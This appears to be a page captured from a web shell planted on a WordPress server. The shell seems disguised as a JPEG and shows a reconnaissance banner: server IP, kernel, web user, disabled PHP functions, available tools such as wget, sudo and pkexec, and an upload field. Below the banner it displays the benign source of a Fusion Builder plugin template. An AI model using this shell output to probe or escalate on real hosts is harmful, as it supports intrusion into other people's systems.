????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.217 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.eu/wp-content/plugins/fusion-builder/inc/templates/ |
Upload File : |
<script type="text/template" id="fusion-builder-app-template">
<div id="fusion-loader"><span class="fusion-builder-loader"></span></div>
<div id="content-error" title="{{{ fusionBuilderText.content_error_title }}}" style="display:none;">
<p>{{{ fusionBuilderText.content_error_description }}}</p>
</div>
<div id="fusion_builder_controls">
<ul id="fusion-page-builder-tabs">
<li><a href="javascript:void(0)" class="fusion-builder-button">{{ fusionBuilderText.builder }}</a></li>
<li><a href="#" class="fusion-builder-library-dialog">{{ fusionBuilderText.library }}</a></li>
</ul>
<div class="fusion-page-builder-controls">
<a href="#" class="fusion-builder-layout-buttons fusion-builder-layout-buttons-toggle-containers" title="{{ fusionBuilderText.toggle_all_sections }}"><span class="dashicons-before dashicons-arrow-down"></span></a>
<a href="#" class="fusion-builder-layout-buttons fusion-builder-layout-custom-css <?php echo $has_custom_css; ?>" title="{{ fusionBuilderText.custom_css }}"><span class="fusiona-code"></span></a>
<a href="#" class="fusion-builder-layout-buttons fusion-builder-template-buttons-save" title="{{ fusionBuilderText.save_page_layout }}"><span class="fusiona-drive"></span></a>
<a href="#" class="fusion-builder-layout-buttons fusion-builder-layout-buttons-clear" title="{{ fusionBuilderText.delete_page_layout }}"><span class="fusiona-trash-o"></span></a>
<a href="javascript:void(0)" class="fusion-builder-layout-buttons fusion-builder-layout-buttons-history" title="{{ fusionBuilderText.history }}">
<span class="dashicons dashicons-backup"></span>
<ul class="fusion-builder-history-list">
<li class="fusion-empty-history fusion-history-active-state" data-state-id="1"><span class="dashicons dashicons-arrow-right-alt2"></span>{{ fusionBuilderText.empty }}</li>
</ul>
</a>
</div>
<div class="fusion-custom-css">
<?php
$echo_custom_css = '';
if ( '' != $saved_custom_css ) {
$echo_custom_css = $saved_custom_css;
} ?>
<textarea name="_fusion_builder_custom_css" id="fusion-custom-css-field" placeholder="{{ fusionBuilderText.add_css_code_here }}"><?php echo $echo_custom_css; ?></textarea>
</div>
</div>
<div id="fusion_builder_container">
<?php do_action( 'fusion_builder_before_content' ); ?>
</div>
<?php do_action( 'fusion_builder_after_content' ); ?>
<div id="fusion-builder-layouts">
<?php fusion_builder_display_library_content(); ?>
</div>
</script>